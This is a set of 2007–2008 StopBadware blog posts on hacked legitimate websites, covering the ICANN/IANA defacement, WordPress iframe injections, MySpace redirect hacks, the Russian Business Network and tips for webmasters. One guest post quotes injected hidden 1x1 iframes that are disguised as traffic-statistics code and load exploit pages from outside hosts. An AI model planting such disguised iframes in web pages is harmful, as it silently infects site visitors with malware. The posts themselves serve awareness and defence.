Posted by Erica George
Fri, 27 Jun 2008 15:54:00 GMT
When I talk to friends about web-based badware, one of the most frequent things I hear is a version of “Oh, I don’t have to worry about that – I don’t go to any sketchy sites.” The security world has known for a while now that even legitimate, trusted websites can be hacked, but that knowledge still hasn’t made its way out to much of the public. It often takes the hacking of a prominent site to shatter the illusion.
This week, the website of ICANN, the Internet Corporation for Assigned Names and Numbers, was hacked and defaced, along with the site for IANA, the Internet Assigned Numbers Authority. ICANN is the group in charge of internet governance at its most basic level, choosing which new top-level domains (like .com or .org) to create, and setting the protocols for how internet addresses work. Ironically, it was the domain name settings for the ICANN and IANA sites themselves that were hacked and redirected to a page with a derisive message.
The hackers fortunately are a group from Turkey apparently more interested in mischief and notoriety than in harming user’s computers, but it would have been easy to redirect ICANN and IANA visitors to a malicious site if that had been the hackers’ goal.
The lesson? As ZDNet’s Dancho Danchev put it:
One thing’s for sure though, if the ICANN and IANA can lose control of their domains, anyone can.
Posted in all | Tags hacking, iana, icann
Posted by Erica George
Wed, 21 May 2008 18:52:00 GMT
Google has rolled out a new resource for owners of compromised websites that it flags as potentially dangerous in its search results.
Google Diagnostics shows information about malware and malware-distributing behaviors that Google has observed on the site within the past 90 days.
We’re already hearing from website owners and the volunteers in our discussion group that the new diagnostics pages are helpful in discovering problems with a site. We’d like to applaud Google for taking this step in greater transparency. This new resource should help website owners in cleaning and securing their sites faster, which will help protect even more internet users.
You can see an example diagnostics page here.
Posted in all | Tags Google, hacking, resources, webmasters, websites
Posted by Erica George
Mon, 18 Feb 2008 21:19:00 GMT
We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:
The StopBadware discussion group
began receiving in January a flurry of reports about WordPress
blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both
of the following iframes were injected into their posts:
<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->
<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->
In spite of their innocent-looking labeling, these links weren’t put on the
pages by the authors, and they’re not for traffic statistics. The iframes,
hosted on sites in Beijing, China, attack a visitor’s computer with the virus
JS_PSYME.XP.
In this
StopBadware thread
about the iframes,
a post by member Ty H describes how to use WordPress Site Admin to repair
defaced blog posts.
In addition to repairing the pages, webmasters need to close the
vulnerability that allows the iframe injections to occur.
On Feb. 5,
WordPress issued version 2.3.3, an urgent security release to patch a flaw
in xmlrpc.php that allowed a user to edit posts of other users. It’s not stated
whether this release is a response to the iframe injections, but the discussion
group members who upgraded to WP 2.3.3 have so far not reported recurrences.
New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers
using automated crawlers. You can register at
http://wordpress.org/ to receive email notifications when new versions are
announced. Enter your email address in the box at the bottom of the page.
A list of known WordPress vulnerabilities can be found at
Secunia.
When users solve problems together in the StopBadware discussion group and
report their findings, it helps others who encounter the same problem later.
Posted in all | Tags community, hacking, security, WordPress
Posted by Erica George
Tue, 22 Jan 2008 20:51:00 GMT
Security vendor Websense has released a report showing that half of the malware-distributing websites it examined in the second part of 2007 were otherwise legitimate sites that had been hacked. The report points to unpatched software vulnerabilities and problems on shared hosting servers as key infection points for hacked sites.
For the many owners of hacked websites StopBadware has worked with over the past year, the fact that so many other sites are in the same predicament is slim consolation for the damage caused. Many owners of small business, nonprofit, and interest-based sites are what we at StopBadware have come to call “consumer webmasters” – website owners who’ve taken advantage of easy and cheap hosting plans and the simplicity of many content management systems to create fully functioning websites without needing technical skills. When a consumer webmaster’s site is hacked, he or she has no technical staff to turn to, and may not even know where to look online for help.
If you’re a website owner, don’t wait until your site is hacked to find help. Talk with your web hosting provider about their security precautions, and ask them how they’d handle a malicious attack. Look for user forums for the software you use to manage your site, and make sure you’ll be one of the first to know when there are new security updates. Finding a network of others working with the same website setup will mean you have peers to turn to if your site ever does run into problems.
Of course, StopBadware’s own resources are also available. Our security tips for webmasters is designed for owners of any site, whether or not it has been the victim of a hacking attack. And our discussion group is a growing community where webmasters (and any internet user) can seek help and advice. For every internet user, the hacking of legitimate websites is a reason for caution. Even trusted sites can be attacked, so it’s important to protect your computer regardless of where your web surfing takes you. If you don’t know where to begin, start at our help pages on badware.
Posted in all | Tags community, hacking
Posted by Erica George
Thu, 29 Nov 2007 21:33:00 GMT
In the last few days, there has apparently been a surge of badware-distributing web sites that trick search engines into thinking they’re legitimate. Researchers at Sunbelt Software first reported the gaming of Google results a few days ago, with articles following from the BBC, ComputerWorld, and others. Google* has reportedly removed the offending sites from its results, saying violations of its quality guidelines can lead to removal from its index. The gaming attacks have also affected other major search engines, though reports indicate the exploits on the malicious websites were coded to target only Google searchers.
The attacks were carried out on massive numbers of newly registered domains, apparently primarily hosted in the US but registered in China. Be suspicious of highly ranked search results that appear to be from a US-based site, but that link to a .cn (Chinese) or other national domain in the website’s address, and of websites whose addresses are entirely strings of random characters without any words or names. As always, an important part of protecting yourself online is keeping your software – including browsers, anti-virus and anti-spyware applications – up to date. If you suspect your computer may have been infected, check out our tips for badware removal.
* Note: Google is a StopBadware sponsor and partner.
Posted in all | Tags badware, Google, hacking, search
Posted by Erica George
Fri, 09 Nov 2007 22:41:00 GMT
MySpace users, look out for a new brand of website hacking technique that’s emerged over the past week. The hack inserts code that loads a background image linking back to a badware site, and has so far had several prominent victims, most notably pop star Alicia Keyes.
A user who clicks anywhere on the site that is not a legitimate, pre-existing link will be redirected by the linked background image to the badware site, apparently hosted in China. The user will also be prompted to download a codec to view videos – something one might expect on a MySpace page – which itself delivers malware.
The attacks were first noted last week by researchers at FaceTime Communications, and have gained widespread coverage this week due to the hacking of Keyes’s page.
While MySpace reacted quickly to reports of the hacks, there is also word that Keyes’s page, at least, has been reinfected once. There’s no estimate yet on how many users may have been infected, or how many MySpace pages have been compromised, but one thing seems certain: this is a technique to watch out for in the future, on MySpace, and beyond.
Posted in all | Tags codecs, exploits, hacking, myspace
Posted by Erica George
Fri, 09 Nov 2007 15:54:00 GMT
The internet security community is buzzing with the news that the Russian Business Network (RBN), a notorious group of professional badware distributors and online criminals, has pulled down its websites and abandoned its IP addresses, effectively vanishing from the internet. The RBN has been behind numerous large-scale attacks, and has been traced as an attacking source of several sites that have ended up in the Badware Website Clearinghouse.
Unfortunately, it seems clear that the RBN’s disappearance is simply a technique for moving deeper underground, a move likely precipitated by recent increased attention and publicity around the RBN. The anti-malware company Trend Micro is already reporting observing RBN-like activity in China and other parts of Asia.
It’s unlikely that the RBN will consolidate operations in any new home in the same way it operated for so long in Russia, instead diversifying the locations of both its online and on-the-ground operations, making it harder to track. For security researchers and makers of protective software, the disappearance of the RBN is less a victory than a new challenge.
Posted in all | Tags badware, crime, hacking, RBN, RussianBusinessNetwork
Posted by Erica George
Thu, 06 Sep 2007 21:56:00 GMT
If you’re a regular reader of this blog, by now you’re probably familiar with the idea of hackers who inject code – often invisible iframes or javascript – onto otherwise innocent but poorly secured sites.
Another way that sites can be compromised is equally important but often harder to recognize: third party content. When we think about third party content, we often think about ad networks, which place outside links, text, and often graphics on participating websites. Ads aren’t the only way third party content is used on today’s websites, however. Many sites use hit counters that are hosted independently, as well as website “toys” and decorations such as remotely hosted images.
In many cases, third party content is perfectly fine. There are safe ads, safe counters, and safe remote image hosts. If you’re a webmaster, choosing to use third party content on your site means taking responsibility to be sure that content is safe, and remains safe. Carefully screen the ad networks you choose to partner with, and ask how they prevent badware from compromising their network. Do a quick internet search and see what other users are saying about the security of that new counter you’re thinking about installing. And once you’re using third party content on your site, regularly check to be sure that it’s still safe.
Choosing to use third party content means inviting someone else to have control over part of your website. Choose carefully, and stay vigilant, to help keep your website’s visitors safe and your site secure.
Posted in all | Tags ads, counters, hacking, security, thirdpartycontent
Posted by Erica George
Tue, 21 Aug 2007 20:48:00 GMT
The webmaster of a site that was hacked to distribute badware has teamed up with a volunteer on the StopBadware discussion forum to trace the hack through her site, and share her story with others. Rebecca the webmaster and Jart the volunteer hope their case study of the cleaning and securing of Rebecca’s site can help educate other webmasters about dealing with attacks and the bad code and backdoors hackers can leave behind.
Rebecca first learned that something had happened to her site when a badware warning appeared in search results for the site on Google. Following Google’s pointers to StopBadware’s Security Tips, Rebecca checked her site and found hidden iframes she knew she hadn’t inserted. She removed the iframes, but was surprised to learn that the issues on her site went even deeper.
With the help of StopBadware volunteer Jart, Rebecca uncovered subtler hacks, including SQL injections and administrator accounts that gave unknown parties full access to her site. Rebecca outlines the various steps Jart helped her through to determine the extent of the damage to her site, and to regain control by securing the site against future attacks. Now Rebecca is learning from Jart so that she too can help others clean and secure their sites.
The quick case study is well worth the read for any webmaster, whether or not their site has been hacked. Thanks, Rebecca and Jart, for sharing it with us!
Posted in homepage, all | Tags community, hacking, securitytips
Posted by Erica George
Mon, 26 Mar 2007 19:55:00 GMT
If you’ve been following StopBadware’s work over the past few months, you know that we have witnessed a sharp increase in the number of websites distributing badware. More and more of these sites are turning out not to be malicious distributors of bad software, but otherwise innocent websites that have been hacked and made to distribute badware without the knowledge of the sites’ owners. In the past weeks, we’ve even seen hacking attacks hit the sites of several friends of the Berkman Center, StopBadware’s parent institution at Harvard.
Berkman fellow Ethan Zuckerman shares a detailed and insightful account of one such attack in a recent post to his blog. A website owned by a friend of Zuckerman’s was hacked, and subject to a Google search warning and listing in the Badware Website Clearinghouse. Zuckerman initially assumed that his friend’s site must be listed by mistake, but quickly learned that the site had been compromised. As Zuckerman tracked down what had happened to his friend’s site, he uncovered the source of the attack – an organized crime outfit known as the RBusiness Network, currently based in Panama.
How risky is an infected site to visitors? Zuckerman examines one of the exploits used by RBusiness, noting that “[b]asically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system.” Badware producers then use these invisible downloads to steal financial data for use in fraud or identity theft.
StopBadware is not the only group noticing increases in this kind of website hack. Symantec’s recent Internet Security Threat Report, for example, noted an increase in malware designed to steal financial data from victims.
How can you protect yourself? If you run a website, check out StopBadware’s Security Tips page, and talk to your hosting provider to be sure your site is secure. When browsing the internet, be sure your computer is running up-to-date, fully patched software, with anti-virus and anti-spyware protection. Last, if you do come across badware as you surf the internet, please share your story. The more we know about badware and the criminals who produce it, the better we can help internet users and webmasters keep themselves safe.
Posted in homepage, all | Tags badware, hacking
|
